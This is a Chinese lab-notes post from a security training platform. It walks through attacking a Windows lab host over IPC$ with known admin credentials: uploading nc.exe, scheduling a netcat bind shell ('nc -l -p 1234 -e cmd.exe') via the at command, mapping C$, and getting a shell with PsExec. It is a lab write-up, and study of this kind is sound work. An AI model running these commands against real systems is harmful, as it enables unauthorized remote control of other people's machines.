实验吧笔记-IPC$管道攻击与防御方法

来源:互联网 发布:java导入自己的package 编辑:程序博客网 时间:2024/05/29 12:48
借助NC获取目标shell

    实验目的:
        1)掌握IPC$连接建立
        2)掌握AT命令使用方法
        3)掌握nc建立后门
    
    实验原理:利用IPC$管道命令,建立与远程主机的连接。利用连接打开远程主机的默认共享目录,上传NC软件到远程主机上,在利用at命令建立执行nc的任务,nc打开远程主机端口,等待攻击主机连接。建立连接后,可在远程主机上执行cmd命令。
    
    一、建立IPC$管道
    
        1.1 在命令行中输入
        “cd \”” net use \192.168.1.3\ipc$ “Simplexue123” /user:Administrator ”,已知目标主机的账号(administrator)密码(Simplexue123),建立IPC$管道。
        
        1.2 进入工具目录,利用copy命令上传nc文件
        copy nc.exe \\192.168.1.3
        
        1.3 查看远程主机时间。net time \\192.168.1.3
        
    二、利用at命令定时运行nc程序    
        
        2.1 在命令行下利用at命令在目标机上建立NC计划任务。
        at \\192.168.1.3 17:23 nc -1 -p 1234 -t -e cmd.exe
        
        2.2 在nc任务到时间执行后,再命令行下连接目标主机。
        telnet 192.168.1.3 1234
        
==========================================================================================================

借助PsExec获得目标shell

    实验目的:
        1)了解IPC$漏洞原理
        2)掌握IPC$漏洞攻击方法
        3)掌握PsExec工具的使用
        4)掌握远程控制工具上兴软件的使用
        
    一、IPC$漏洞原理
        IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。还可以访问共享资源,并使用一些字典工具,进行密码探测,以至于获得更高的权限。
        其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
        
    二、远程软件控制原理
        远程控制软件一般分客户端程序(Client)和服务器端程序(Server)两部分,通常将客户端程序安装到主控端的电脑上,将服务器端程序安装到被控端的电脑上。使用时客户端程序向被控端电脑中的服务器端程序发出信号,建立一个特殊的远程服务,然后通过这个远程服务,使用各种远程控制功能发送远程控制命令,控制被控端电脑中的各种应用程序运行。
    
    实验步骤:
    
        一、打开被攻击机即目标主机的IPC$默认共享(此步骤可跳过)
            net share C$=C:
            
            1.1 启动实验台,以实验台为被攻击机即目标主机。利用IPC$漏洞实施攻击,首先要保证被攻击机IPC$默认共享已经打开。在实验台中可用“net share”命令开启IPC$共享,同时查看IPC$共享。
            
        二、利用net命令与远程主机建立IPC$连接    
            
            2.1 首先设置远程主机的账户密码(此步骤可跳过)
            
            2.2 在命令行输入命令”
            net use \\192.168.1.3\ipc$ “Simplexue123” /user:”administrator
            ” ”与目标主机建立IPC$连接
            
            2.3 在命令行下利用cd进入软件目录“C:\实验工具集\06网络与无线安全\01典型协议攻击\第4节 Windows下IPC$管道的建立和远程控制”,利用copy命令向服务器复制a.txt文件。
            copy a.txt \\192.168.1.3
            
            2.4 将对方的C盘映射为本地的Z盘,则可以像操纵本地硬盘一样对目标主机C盘进行操作。
            net use z: \\192.168.1.3\C$
            
        三、利用工具PSEXEC实施攻击

            3.1 利用PsExec工具获得对方的Shell,命令如下:
            PsExec \远程主机ip –u 用户名 –p 密码 cmd.exe;
            这里的-u和-p参数分别指定远程主机的用户名和密码,cmd.exe是远程主机的命令行程序。
            
            3.2通过下图可以看到ipconfig命令已经在远程主机上执行了,获得的是对方主机的IP地址192.168.1.3。

原创粉丝点击